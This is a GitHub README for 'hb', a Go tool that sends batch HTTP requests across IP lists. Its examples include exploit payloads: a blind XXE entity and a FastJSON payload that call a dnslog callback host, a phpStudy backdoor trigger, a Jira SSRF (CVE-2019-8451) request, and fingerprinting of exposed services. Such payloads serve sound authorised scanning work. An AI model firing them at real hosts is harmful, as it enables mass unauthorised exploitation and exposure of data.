Skip to content
forked from c26root/hb

Fast http batch request tool

Notifications You must be signed in to change notification settings

jas502n/title-hb

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

hb

Fast http batch request tool

Installing

bash build.sh

Example

Load File Target

./hb -f ips.txt -p 80

Add HTTP Header

-H "Host: bypasscdn"

Show ProgressBar

-pg

Follow redirect (30x)

-redirect

Filter Response Body

-grep "admin"

Filter Response Header (X-Powered-By ContentType Title)

-filter "nginx"

Filter Response Status Code

-code 2 # 2xx

Show Resposne Body

-response

Shuffle Request

-random

Send Post Request

-body "a=1&b=2&c=2"

# post body from file
-bodyfile ./exploit

Send PUT Request

-method PUT

Show Request Error

-debug 

Elasticsearch

-p 9200 -path "/_cat" -grep "/_cat/allocation"

PHPINF0

-path /phpinfo.php -code 2 -grep 'PHP Version' -regexp 'PHP Version(.*?)<'

XXE Blind

-body '<?xml version="1.0"?><!DOCTYPE ANY [<!ENTITY remote SYSTEM "http://{{hostname}}.dnslog/">]><x>&remote;</x>' -replace

FastJSON Blind

-H "Content-Type: application/json" -body '{"@type": "java.net.InetAddress", "val":"{{hostname}}.dnslog"}' -replace -redirect

Weblogic fingerprint

-p 7001 -H "Authorization: Basic" -code 401

phpStudy Backdoor

-H "Accept-Charset: cGhwaW5mbygpOwo=" -H "Accept-Encoding: gzip,deflate" -grep 'PHP Version' -regexp '<tr><td class="e">disable_functions</td><td class="v">(.*?)</td>' -redirect

CVE-2019-8451 Jira SSRF

-path "/plugins/servlet/gadgets/makeRequest?url={{scheme}}://{{host}}@baidu.com/" -H "X-Atlassian-Token: no-check" -replace -grep "www.baidu.com" -regexp '<meta name="ajs-version-number" content="(.*?)">' -redirect

About

Fast http batch request tool

Resources

Stars

Watchers

Forks

Packages

No packages published

Languages

  • Go 96.2%
  • Shell 3.8%